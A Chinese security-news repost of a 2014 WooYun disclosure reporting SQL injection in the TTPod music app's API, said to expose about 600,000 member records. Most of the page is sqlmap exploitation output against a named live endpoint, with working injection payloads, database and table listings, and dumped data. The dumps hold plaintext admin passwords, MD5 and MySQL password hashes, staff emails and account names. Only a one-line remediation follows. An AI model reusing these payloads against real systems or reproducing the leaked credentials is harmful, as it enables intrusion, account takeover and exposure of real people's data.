记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

天天动听APP客户端存在SQL注入漏洞可导致近60W会员信息泄露可脱裤

2014-08-08 03:35

发现来源安卓客户端天天动听最新版



注入点:http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016



GET参数f存在注入

通知存在注入点,未做进一步测试!



sqlmap.py -u 'http://api.busdh.com/market-api/appgame/global?f=f384&v=v6.5.0.2013123016' -p "f" --batch

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

---

Place: GET

Parameter: f

Type: boolean-based blind

Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)

Payload: f=f384' RLIKE (SELECT (CASE WHEN (5571=5571) THEN 0x66333834 ELSE 0x28 END)) AND 'snjQ'='snjQ&v=v6.5.0.2013123016



Type: error-based

Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)

Payload: f=f384' AND UPDATEXML(3360,CONCAT(0x2e,0x716e6b6171,(SELECT (CASE WHEN (3360=3360) THEN 1 ELSE 0 END)),0x716e616d71),6423) AND 'tnpf'='tnpf&v=v6.5.0.2013123016



Type: UNION query

Title: MySQL UNION query (NULL) - 1 column

Payload: f=f384' UNION ALL SELECT CONCAT(0x716e6b6171,0x4e506c54656853686e61,0x716e616d71)#&v=v6.5.0.2013123016



Type: AND/OR time-based blind

Title: MySQL > 5.0.11 OR time-based blind

Payload: f=-8917' OR 5490=SLEEP(5) AND 'FWhc'='FWhc&v=v6.5.0.2013123016

---

back-end DBMS: MySQL 5.1



available databases [22]:

[*] db_12530

[*] db_atj

[*] db_ayyc

[*] db_browsernav

[*] db_ddfg

[*] db_draw_busdh_com

[*] db_ios_skin

[*] db_market

[*] db_new_ttpod

[*] db_skin

[*] db_ttpod_discuz

[*] db_ttpod_ucenter

[*] db_update

[*] draw_busdh_com

[*] earphone

[*] entnews

[*] information_schema

[*] mysql

[*] performance_schema

[*] skin

[*] ttpod

[*] yuledb



http://draw.busdh.com/

Database: db_draw_busdh_com

Table: userinfo

[15 entries]

+-------------+--------------------+----------+---------------------+--------------+

| id | email | userName | createTime | userPassword |

+-------------+--------------------+----------+---------------------+--------------+

| 00000000426 | jiege82000@163.com | admin | 2013-10-31 14:02:11 | admin |

| 00000000427 | hr@ttpod.com | ttpod | 2013-10-31 14:06:33 | ttpod*()98 |

| 00000000428 | hr@ttpod.com | view | 2013-10-31 15:11:39 | view |

+-------------+--------------------+----------+---------------------+--------------+





http://fm.admin.ttpod.com/

http://admin.lrc.ttpod.com/auth/login





Database: ttpod

Table: admin

[10 entries]

+----+-------+------+----------------------------------+---------------------+

| id | name | flag | password | create_time |

+----+-------+------+----------------------------------+---------------------+

| 1 | ttpod | 0 | 5bb50d44821fffd63299af3025234087 | 2012-01-18 00:00:00 |

| 20 | baidu | 0 | dbf2074a06e4d98e7a291a38270af7b9 | 2013-01-31 08:39:39 |

+----+-------+------+----------------------------------+---------------------+



Database: db_new_ttpod

Table: users

[30 entries]

+----+----------------+---------------+----------------------------------------------------------------------------------------------+

| id | email | username | password |

+----+----------------+---------------+----------------------------------------------------------------------------------------------+

| 1 | clong@test.com | clong | 1100 |

| 2 | user1@test.com | user1 | $shiro1$SHA-256$500000$Cz8CvbpUrpgkk+k8puy3iA==$VRXptpQeeCwzYDTq+ZEr8rrTFFUIIan/Xk5jwHXFRYg= |

| 3 | admin@test.com | admin | jianguo*()98 |

| 4 | user2@test.com | user2 | $shiro1$SHA-256$500000$l48hH1mNJTZC35z6YPyj0w==$FyrwtiltMAdv7bwghfmGzqReJFliYcocbgiZkSaavMU= |

| 5 | <blank> | tcode_manager | ttpodt1n50 |

| 6 | <blank> | tcode_user | ttpod123 |

+----+----------------+---------------+----------------------------------------------------------------------------------------------+







database management system users [10]:

[*] 'db_bbs'@'10.0.2.%'

[*] 'db_browsernav'@'%'

[*] 'db_skin'@'%'

[*] 'db_skin'@'10.0.2.%'

[*] 'draw_busdh_com'@'10.0.2.%'

[*] 'earphone'@'%'

[*] 'link'@'%'

[*] 'root'@'localhost'

[*] 'slave'@'%'

[*] 'webis'@'%'





database management system users password hashes:

[*] db_bbs [1]:

password hash: *730A86BC4C3F693A6862F939E48BEBB75D786189

[*] db_browsernav [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] earphone [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] link [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] root [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5

[*] webis [1]:

password hash: *01D060A476642BA8335B832AC5B211F222F641B5



Database: db_ttpod_ucenter

+---------------------+---------+

| Table | Entries |

+---------------------+---------+

| uc_members | 594367 |

| uc_memberfields | 594365 |

| uc_newpm | 421201 |

| uc_pms | 4622 |

| uc_friends | 4276 |

| uc_pm_members | 2400 |

| uc_pm_indexes | 2059 |

| uc_pm_lists | 1237 |

| uc_notelist | 516 |

| uc_pm_messages_2 | 223 |

| uc_pm_messages_3 | 221 |

| uc_pm_messages_8 | 221 |

| uc_pm_messages_7 | 216 |

| uc_pm_messages_9 | 208 |

| uc_pm_messages_5 | 200 |

| uc_pm_messages_1 | 199 |

| uc_pm_messages_0 | 198 |

| uc_pm_messages_6 | 188 |

| uc_pm_messages_4 | 185 |

| uc_settings | 28 |

| uc_vars | 3 |

| uc_admins | 1 |

| uc_applications | 1 |

| uc_failedlogins | 1 |

| uc_protectedmembers | 1 |

+---------------------+---------+



[00:46:28] [INFO] the SQL query used returns 404 entries

Database: db_ttpod_discuz

+---------------------------------------+---------+

| Table | Entries |

+---------------------------------------+---------+

| pre_forum_post | 847629 |

| cdb_posts | 727193 |

| pre_common_member_log | 501857 |

| cdb_members | 501856 |

| cdb_memberfields | 501844 |

| pre_common_member_count_archive | 467197 |

| pre_common_member_field_forum_archive | 467197 |

| pre_common_member_profile_archive | 467197 |

| pre_common_member_status_archive | 467197 |

| pre_common_member_field_home_archive | 467196 |

| pre_common_member_archive | 467189 |

| pre_common_onlinetime | 294138 |

| pre_home_notification | 208959 |

| cdb_onlinetime | 204705 |

| pre_common_credit_rule_log | 166058 |

| pre_forum_attachment | 165258 |

| pre_forum_thread | 153779 |

| cdb_attachments | 124347 |

| pre_common_member | 110564 |

| pre_common_member_status | 110563 |

| pre_common_member_count | 110562 |

| pre_common_member_field_forum | 110561 |

| pre_common_member_field_home | 110561 |

| pre_common_member_profile | 110561 |

| pre_forum_threadaddviews | 105521 |

| pre_common_credit_log | 98319 |

| cdb_threads | 90232 |

| pre_security_evilpost | 86098 |

| cdb_spacecaches | 85234 |

| pre_common_member_newprompt | 72957 |

| pre_plugin_user_defender_badpwd | 66821 |

| pre_forum_threadmod | 60158 |

| pre_forum_ratelog | 59086 |

| cdb_ratelog | 57426 |

| pre_forum_threadpartake | 51160 |

| cdb_attachpaymentlog | 45503 |

| pre_common_district | 45052 |

| pre_forum_statlog | 37616 |

| pre_forum_pollvoter | 32688 |

| cdb_memberspaces | 30319 |

| pre_forum_filter_post | 23690 |

| pre_common_connect_guest | 22800 |

| cdb_threadsmod | 21460 |

| pre_connect_memberbindlog | 21201 |

| pre_common_member_connect | 19835 |

| pre_common_admincp_cmenu | 18913 |

| cdb_admincustom | 18903 |

| pre_forum_attachment_2 | 17757 |

| pre_forum_attachment_3 | 17259 |

| pre_forum_attachment_6 | 16682 |

| pre_forum_attachment_1 | 16646 |

| pre_forum_attachment_9 | 16357 |

| pre_forum_attachment_0 | 16104 |

| pre_forum_attachment_4 | 15775 |

| pre_forum_attachment_7 | 15662 |

| pre_forum_attachment_5 | 15462 |

| pre_forum_attachment_8 | 15196 |

| pre_home_friend_request | 13045 |

| pre_forum_modwork | 10522 |

| pre_connect_feedlog | 10034 |

| pre_security_eviluser | 9110 |

| pre_home_favorite | 8838 |

| cdb_myposts | 8810 |

| pre_forum_attachment_exif | 8667 |

| pre_forum_sofa | 8462 |

| cdb_favorites | 8394 |

| pre_discuz_security_banip | 8126 |

| pre_forum_thread_censor | 8106 |

| cdb_pms | 7829 |

| pre_common_word | 7497 |

| pre_forum_postcache | 7136 |

| cdb_modworks | 5622 |

| pre_connect_postfeedlog | 5457 |

| cdb_mythreads | 4832 |

| pre_connect_tthreadlog | 4735 |

| pre_common_remote_port | 4272 |

| pre_common_member_crime | 4201 |

| pre_forum_threadimage | 2599 |

| pre_common_magiclog | 2588 |

| cdb_magiclog | 2369 |

| pre_forum_medallog | 2369 |

| cdb_medallog | 2120 |

| pre_common_credit_rule_log_field | 2004 |

| pre_common_member_grouppm | 1599 |

| pre_forum_attachment_unused | 1449 |

| pre_common_credit_log_field | 1438 |

| cdb_paymentlog | 1425 |

| pre_forum_polloption | 1273 |

| cdb_polloptions | 1136 |

| pre_common_tagitem | 1116 |

| pre_common_member_medal | 1095 |

| pre_forum_postcomment | 1091 |

| pre_forum_newthread | 927 |

| pre_forum_threaddisablepos | 884 |

| pre_home_pic | 826 |

| pre_common_failedip | 825 |

| pre_home_friend | 762 |

| pre_common_member_action_log | 747 |

| pre_common_stat | 698 |

| pre_plugin_banklog | 678 |

| cdb_rsscaches | 638 |

| pre_forum_threadclass | 552 |

| pre_forum_post_tableid | 513 |

| pre_common_smiley | 501 |

| cdb_smilies | 472 |

| pre_common_setting | 465 |

| cdb_buddys | 462 |

| cdb_regips | 452 |

| pre_home_friendlog | 389 |

| cdb_stylevars | 360 |

| pre_discuz_security_manager_action | 357 |

| pre_forum_warning | 338 |

| pre_common_session | 336 |

| pre_discuz_security_forum | 327 |

| pre_common_statuser | 306 |

| pre_common_tag | 301 |

| cdb_warnings | 281 |

| pre_common_block_item | 254 |

| pre_home_comment | 250 |

| cdb_settings | 238 |

| pre_common_syscache | 229 |

| pre_forum_threadhot | 216 |

| pre_forum_poll | 190 |

| pre_home_pokearchive | 188 |

| cdb_words | 187 |

| pre_common_regip | 176 |

| cdb_polls | 169 |

| pre_home_feed | 167 |

| pre_forum_post_location | 161 |

| pre_forum_threadcalendar | 158 |

| pre_plugin_bankoperation | 155 |

| cdb_banned | 141 |

| pre_home_poke | 137 |

| pre_common_stylevar | 135 |

| cdb_statvars | 130 |

| pre_common_member_magic | 125 |

| pre_forum_rsscache | 115 |

| pre_common_block_pic | 108 |

| pre_baidusubmit_sitemap | 106 |

| pre_plugin_user_defender_stat | 105 |

| pre_common_block_style | 103 |

| cdb_membermagics | 102 |

| pre_home_follow | 98 |

| pre_home_visitor | 94 |

| pre_forum_hotreply_member | 93 |

| cdb_moderators | 90 |

| pre_common_searchindex | 90 |

| pre_forum_hotreply_number | 90 |

| pre_forum_moderator | 83 |

| pre_common_admincp_perm | 77 |

| cdb_threadtypes | 73 |

| pre_common_report | 72 |

| pre_forum_forum | 69 |

| pre_forum_forumfield | 69 |

| cdb_medals | 67 |

| pre_forum_medal | 67 |

| pre_forum_spacecache | 67 |

| cdb_forumlinks | 65 |

| cdb_typeoptions | 65 |

| pre_forum_typeoption | 65 |

| pre_common_pluginvar | 61 |

| pre_common_nav | 59 |

| cdb_forumfields | 58 |

| cdb_forums | 58 |

| pre_common_devicetoken | 54 |

| cdb_rewardlog | 52 |

| cdb_reportlog | 51 |

| pre_common_member_profile_setting | 51 |

| cdb_stats | 50 |

| pre_pig_member | 50 |

| pre_common_block | 49 |

| pre_common_cache | 49 |

| cdb_caches | 42 |

| cdb_subscriptions | 41 |

| pre_forum_attachtype | 41 |

| pre_common_member_verify | 39 |

| pre_common_member_secwhite | 38 |

| pre_common_optimizer | 36 |

| pre_common_template_block | 35 |

| pre_common_usergroup_field | 35 |

| cdb_attachtypes | 34 |

| cdb_faqs | 34 |

| cdb_usergroups | 33 |

| pre_forum_thread_moderate | 33 |

| pre_home_album | 33 |

| pre_common_credit_rule | 32 |

| cdb_promotions | 31 |

| pre_common_usergroup | 31 |

| pre_home_blog | 27 |

| pre_home_blogfield | 27 |

| pre_common_magic | 25 |

| pre_common_friendlink | 22 |

| pre_common_plugin | 22 |

| cdb_threadtags | 21 |

| pre_common_cron | 20 |

| cdb_tags | 19 |

| pre_common_banned | 18 |

| pre_plugin_user_defender | 18 |

| cdb_failedlogins | 17 |

| cdb_searchindex | 15 |

| pre_forum_poststick | 15 |

| pre_home_click | 15 |

| cdb_crons | 13 |

| pre_common_grouppm | 13 |

| pre_common_myapp | 13 |

| cdb_magics | 12 |

| cdb_projects | 12 |

| pre_common_failedlogin | 12 |

| pre_forum_bbcode | 11 |

| pre_home_doing | 11 |

| pre_common_admincp_member | 10 |

| pre_security_member | 10 |

| cdb_bbcodes | 9 |

| cdb_ranks | 9 |

| cdb_styles | 9 |

| pre_baidusubmit_setting | 9 |

| pre_common_secquestion | 9 |

| pre_baidusubmit_urlstat | 8 |

| pre_forum_polloption_image | 8 |

| pre_forum_post_moderate | 8 |

| cdb_templates | 7 |

| cdb_magicmarket | 6 |

| cdb_request | 6 |

| pre_common_diy_data | 6 |

| pre_forum_onlinelist | 6 |

| pre_home_show | 6 |

| cdb_announcements | 5 |

| pre_common_admincp_group | 5 |

| pre_common_admingroup | 5 |

| pre_common_advertisement | 5 |

| pre_common_member_verify_info | 5 |

| cdb_admingroups | 4 |

| cdb_creditslog | 4 |

| cdb_imagetypes | 4 |

| cdb_onlinelist | 4 |

| cdb_typemodels | 4 |

| pre_common_process | 4 |

| pre_discuz_security_adminlog | 4 |

| pre_forum_access | 4 |

| pre_forum_imagetype | 4 |

| pre_forum_threadclosed | 4 |

| pre_plugin_user_defender_failedlogin | 4 |

| pre_common_word_type | 3 |

| pre_forum_grouplevel | 3 |

| pre_forum_replycredit | 3 |

| pre_home_class | 3 |

| cdb_access | 2 |

| cdb_advertisements | 2 |

| pre_common_admincp_session | 2 |

| pre_common_patch | 2 |

| pre_common_style | 2 |

| pre_common_template | 2 |

| pre_forum_promotion | 2 |

| pre_mobile_setting | 2 |

| pre_plugin_banklist | 2 |

| pre_tools_rule | 2 |

| pre_yy_killreg | 2 |

| cdb_adminactions | 1 |

| cdb_adminsessions | 1 |

| cdb_itempool | 1 |

| cdb_pmsearchindex | 1 |

| cdb_profilefields | 1 |

| pre_common_addon | 1 |

| pre_common_uin_black | 1 |

| pre_forum_announcement | 1 |

| pre_forum_threadprofile | 1 |

| pre_forum_trade | 1 |

| pre_hdx_player_activity | 1 |

| pre_home_picfield | 1 |

| pre_home_share | 1 |

+---------------------------------------+---------+



Database: ttpod

Table: admin

[10 entries]

+----+-------+------+----------------------------------+---------------------+

| id | name | flag | password | create_time |

+----+-------+------+----------------------------------+---------------------+

| 1 | ttpod | 0 | 5bb50d44821fffd63299af3025234087 | 2012-01-18 00:00:00 |

| 20 | baidu | 0 | dbf2074a06e4d98e7a291a38270af7b9 | 2013-01-31 08:39:39 |

+----+-------+------+----------------------------------+---------------------+



Database: db_new_ttpod

Table: users

[30 entries]

+----+----------------+---------------+----------------------------------------------------------------------------------------------+

| id | email | username | password |

+----+----------------+---------------+----------------------------------------------------------------------------------------------+

| 1 | clong@test.com | clong | 1100 |

| 2 | user1@test.com | user1 | $shiro1$SHA-256$500000$Cz8CvbpUrpgkk+k8puy3iA==$VRXptpQeeCwzYDTq+ZEr8rrTFFUIIan/Xk5jwHXFRYg= |

| 3 | admin@test.com | admin | jianguo*()98 |

| 4 | user2@test.com | user2 | $shiro1$SHA-256$500000$l48hH1mNJTZC35z6YPyj0w==$FyrwtiltMAdv7bwghfmGzqReJFliYcocbgiZkSaavMU= |

| 5 | <blank> | tcode_manager | ttpodt1n50 |

| 6 | <blank> | tcode_user | ttpod123 |

+----+----------------+---------------+----------------------------------------------------------------------------------------------+

漏洞证明:

ttpod.png

修复方案:

有效过滤。

上边贴出的一些隐私信息和相关密码,建议更改下!

知识来源: www.wooyun.org/bugs/wooyun-2014-065996

阅读:119853 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“天天动听APP客户端存在SQL注入漏洞可导致近60W会员信息泄露可脱裤”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云